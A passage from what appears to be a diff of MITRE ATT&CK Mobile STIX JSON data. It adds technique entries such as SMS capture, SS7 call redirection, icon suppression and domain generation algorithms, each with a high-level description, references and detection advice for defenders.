to collect information about nearby networks, such as Wi-Fi and Bluetooth.", + "modified": "2022-03-31T16:33:55.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Information Discovery", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "created": "2017-10-25T14:48:15.920Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1412", + "url": "https://attack.mitre.org/techniques/T1412" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.\n\nOn Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement.\n\nOn iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.", + "modified": "2022-04-01T13:27:29.880Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Capture SMS Messages", + "x_mitre_detection": "On Android, the user can view which applications have permission to access SMS messages through the device settings, and the user can choose to revoke the permission.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:41:56.376Z", + "name": "Endpoint Denial of Service", + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.\n\nOn Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode, preventing the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)\n\nOn iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode; they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users can review which applications have Device Administrator access in the device settings and revoke permission where appropriate. Application vetting services can detect and closely scrutinize applications that utilize Device Administrator access.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "created": "2022-04-06T13:52:05.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1642", + "external_id": "T1642" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + }, + { + "source_name": "Android resetPassword", + "description": "Google. (n.d.). DevicePolicyManager. Retrieved October 1, 2019.", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:59.025Z", + "name": "Out of Band Data", + "description": "Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth. \n\n \n\nOn Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there. \n\n \n\nOn iOS, there is no way to programmatically read push notifications. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If a user sees a notification with text they do not recognize, they should review their list of installed applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "created": "2022-04-06T15:27:34.300Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1644", + "external_id": "T1644" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "created": "2019-10-01T14:18:47.762Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521", + "url": "https://attack.mitre.org/techniques/T1521" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.", + "modified": "2022-04-05T20:11:35.852Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Encrypted Channel", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884", + "created": "2017-10-25T14:48:22.716Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1405", + "url": "https://attack.mitre.org/techniques/T1405" + }, + { + "source_name": "EkbergTEE", + "url": "https://usmile.at/symposium/program/2015/ekberg", + "description": "Jan-Erik Ekberg. (2015, September 10). Android and trusted execution environments. Retrieved December 9, 2016." + }, + { + "source_name": "Thomas-TrustZone", + "url": "https://usmile.at/symposium/program/2015/thomas-holmes", + "description": "Josh Thomas and Charles Holmes. (2015, September). An infestation of dragons: Exploring vulnerabilities in the ARM TrustZone architecture. Retrieved December 9, 2016." + }, + { + "source_name": "QualcommKeyMaster", + "url": "https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html", + "description": "laginimaineb. (2016, June). Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption. Retrieved December 9, 2016." + }, + { + "source_name": "laginimaineb-TEE", + "url": "http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html", + "description": "laginimaineb. (2016, May). War of the Worlds - Hijacking the Linux Kernel from QSEE. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).", + "modified": "2022-04-06T15:41:57.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit TEE Vulnerability", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:51:29.931Z", + "name": "Suppress Application Icon", + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions. \n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker) \n\nBeginning in Android 10, changes were introduced to inhibit malicious applications’ ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application’s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app’s details page in the system settings. If the user clicks the synthesized activity in the launcher, they are taken to the application’s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application’s icon, they should inspect the application to ensure it is genuine. Application vetting services could potentially detect the usage of APIs intended for suppressing the application’s icon.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "created": "2022-03-30T20:06:22.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628/001", + "external_id": "T1628.001" + }, + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022.", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons" + }, + { + "source_name": "LauncherApps getActivityList", + "description": "Android. (n.d.). LauncherApps: getActivityList. Retrieved March 30, 2022.", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist" + }, + { + "source_name": "sunny-stolen-credentials", + "description": "Lukáš Štefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/" + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/" + }, + { + "source_name": "bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019.", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468", + "created": "2017-10-25T14:48:18.583Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1399", + "url": "https://attack.mitre.org/techniques/T1399" + }, + { + "source_name": "Apple-iOSSecurityGuide", + "url": "https://www.apple.com/business/docs/iOS_Security_Guide.pdf", + "description": "Apple. (2016, May). iOS Security. Retrieved December 21, 2016." + }, + { + "source_name": "Roth-Rootkits", + "url": "https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf", + "description": "Thomas Roth. (2013). Next generation mobile rootkits. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)", + "modified": "2022-04-06T15:48:41.647Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify Trusted Execution Environment", + "x_mitre_detection": "Devices may perform cryptographic integrity checks of code running within the TEE at boot time.\n\niOS devices will fail to boot if the software running within the Secure Enclave does not pass signature verification.(Citation: Apple-iOSSecurityGuide)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:23.652Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1459", + "external_id": "T1459" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Device Unlock Code Guessing or Brute Force", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34", + "created": "2017-10-25T14:48:21.667Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1466", + "url": "https://attack.mitre.org/techniques/T1466" + }, + { + "source_name": "NIST-SP800187", + "url": "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf", + "description": "Jeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-3" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.", + "modified": "2022-04-06T15:50:42.480Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Downgrade to Insecure Protocols", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "created": "2017-10-25T14:48:18.937Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1472", + "url": "https://attack.mitre.org/techniques/T1472" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.", + "modified": "2022-04-06T13:57:49.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate Fraudulent Advertising Revenue", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df", + "type": "attack-pattern", + "created": "2017-10-25T14:48:09.446Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1473", + "external_id": "T1473" + } + ], + "modified": "2018-10-17T01:05:10.704Z", + "name": "Malicious or Vulnerable Built-in Device Functionality", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "created": "2022-03-30T19:19:23.777Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1406.001", + "url": "https://attack.mitre.org/techniques/T1406/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.", + "modified": "2022-04-21T17:30:16.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Steganography", + "x_mitre_detection": "Detection of steganography is difficult unless detectable artifacts with a known signature are left behind by the obfuscation process. Look for strings are other signatures left in system artifacts related to decoding steganography.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d", + "created": "2017-10-25T14:48:06.524Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1449", + "url": "https://attack.mitre.org/techniques/T1449" + }, + { + "source_name": "3GPP-Security", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016." + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + }, + { + "source_name": "TheRegister-SS7", + "url": "https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/", + "description": "Iain Thomson. (2017, May 3). After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts. Retrieved November 8, 2018." + }, + { + "source_name": "Positive-SS7", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7-2008", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-37" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).", + "modified": "2022-04-06T15:53:27.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit SS7 to Redirect Phone Calls/SMS", + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation as described by the Communications, Security, Reliability, and Interoperability Council (CSRIC). (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:59:57.485Z", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application’s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications in the device settings. Application vetting services could potentially detect the usage of APIs intended for artifact hiding.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "created": "2022-03-30T20:00:12.654Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628", + "external_id": "T1628" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:37:55.822Z", + "name": "Code Signing Policy Modification", + "description": "Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device. \n\nMobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.\n\nOn iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "created": "2022-03-30T18:13:26.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1632/001", + "external_id": "T1632.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "external_id": "STA-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "created": "2022-04-05T19:59:03.161Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637.001", + "url": "https://attack.mitre.org/techniques/T1637/001" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T19:59:22.888Z", + "created_by_ref": 